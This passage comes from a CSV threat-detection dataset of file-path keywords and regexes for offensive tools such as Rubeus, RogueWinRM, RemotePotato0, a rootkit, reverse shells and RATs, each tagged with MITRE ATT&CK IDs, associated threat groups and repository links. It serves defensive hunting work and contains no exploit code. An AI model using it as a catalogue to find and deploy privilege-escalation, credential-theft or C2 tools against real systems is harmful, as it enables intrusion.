Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","18089" "*\RogueOxidResolver.cpp*",".{0,1000}\\RogueOxidResolver\.cpp.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18090" "*\RogueWinRM.sln*",".{0,1000}\\RogueWinRM\.sln.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","18091" "*\RogueWinRM\*",".{0,1000}\\RogueWinRM\\.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","18092" "*\Root\InventoryApplicationFile\defender-control*",".{0,1000}\\Root\\InventoryApplicationFile\\defender\-control.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#registry","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","18094" "*\Root\InventoryApplicationFile\reghivebackup*",".{0,1000}\\Root\\InventoryApplicationFile\\reghivebackup.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18096" "*\Rootkit.cpp*",".{0,1000}\\Rootkit\.cpp.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","18100" "*\rootkit.dll*",".{0,1000}\\rootkit\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","18101" "*\ROT Shellcode Encoder.csproj*",".{0,1000}\\ROT\sShellcode\sEncoder\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - 
TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","18102" "*\rotateproxy.exe*",".{0,1000}\\rotateproxy\.exe.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","18103" "*\rotateproxy.service*",".{0,1000}\\rotateproxy\.service.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","18104" "*\rotateproxy_*.zip*",".{0,1000}\\rotateproxy_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","18105" "*\rotateproxy-windows*",".{0,1000}\\rotateproxy\-windows.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","18106" 
"*\RottenPotatoNG-main*",".{0,1000}\\RottenPotatoNG\-main.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","18107" "*\RottenPotatoNG-master*",".{0,1000}\\RottenPotatoNG\-master.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","18108" "*\Rottie3 Rmote Admin\*",".{0,1000}\\Rottie3\sRmote\sAdmin\\.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18109" "*\Rottie3.exe*",".{0,1000}\\Rottie3\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18110" "*\Routerscan.7z*",".{0,1000}\\Routerscan\.7z.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage 
devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","18111" "*\RouterScan.exe*",".{0,1000}\\RouterScan\.exe.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","18112" "*\RouterScan.log*",".{0,1000}\\RouterScan\.log.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","18113" "*\RPC Backdoor.sln*",".{0,1000}\\RPC\sBackdoor\.sln.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18114" "*\RPC-Backdoor\*",".{0,1000}\\RPC\-Backdoor\\.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18122" "*\RPC-Backdoor_v1.0.7z*",".{0,1000}\\RPC\-Backdoor_v1\.0\.7z.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC 
Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18123" "*\RPC-Backdoor_v1.0.zip*",".{0,1000}\\RPC\-Backdoor_v1\.0\.zip.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18124" "*\RPC-Backdoor-main*",".{0,1000}\\RPC\-Backdoor\-main.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18125" "*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","18135" "*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18136" "*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","18137" "*\rpcmap.py*",".{0,1000}\\rpcmap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18142" "*\rpcrt.py",".{0,1000}\\rpcrt\.py","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","0","N/A","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","18167" "*\rpt_win.exe",".{0,1000}\\rpt_win\.exe","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","18174" "*\rsocx.exe*",".{0,1000}\\rsocx\.exe.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","18180" "*\rs-shell.exe*",".{0,1000}\\rs\-shell\.exe.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - 
TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","18181" "*\rs-shell-windows.exe*",".{0,1000}\\rs\-shell\-windows\.exe.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","18182" "*\rt_hijacking.exe*",".{0,1000}\\rt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18184" "*\Rubeus.*",".{0,1000}\\Rubeus\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","18187" "*\Rubeus.dll*",".{0,1000}\\Rubeus\.dll.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","18188" "*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","18189" "*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18190" 
"*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Rubeus","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18191" "*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","Rubeus","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Rubeus","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18192" "*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18193" "*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18194" "*\Rubeus.ps1*",".{0,1000}\\Rubeus\.ps1.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","18195" "*\rubeus.txt*",".{0,1000}\\rubeus\.txt.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - 
T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18196" "*\Rubeus\*",".{0,1000}\\Rubeus\\.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","18197" "*\RubeusRoast.cs*",".{0,1000}\\RubeusRoast\.cs.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","18198" "*\Rubeus-Rundll32\*",".{0,1000}\\Rubeus\-Rundll32\\.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","18199" 
"*\ruler.exe*",".{0,1000}\\ruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","18200" "*\run\john *",".{0,1000}\\run\\john\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18201" "*\run\john\*.*",".{0,1000}\\run\\john\\.{0,1000}\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18202" "*\run\john\*.com*",".{0,1000}\\run\\john\\.{0,1000}\.com.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18203" "*\run\john\*.pl*",".{0,1000}\\run\\john\\.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18204" "*\run\john\*.py*",".{0,1000}\\run\\john\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password 
cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18205" "*\RunasCs.cs*",".{0,1000}\\RunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","18206" "*\RunasCs.exe*",".{0,1000}\\RunasCs\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18207" "*\RunasCs.exe*",".{0,1000}\\RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18208" "*\RunasCs.zip*",".{0,1000}\\RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - 
TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","18209" "*\RunasCs_binaries.zip*",".{0,1000}\\RunasCs_binaries\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","18210" "*\RunasCs_x86.zip*",".{0,1000}\\RunasCs_x86\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","18211" "*\runasppl.py*",".{0,1000}\\runasppl\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 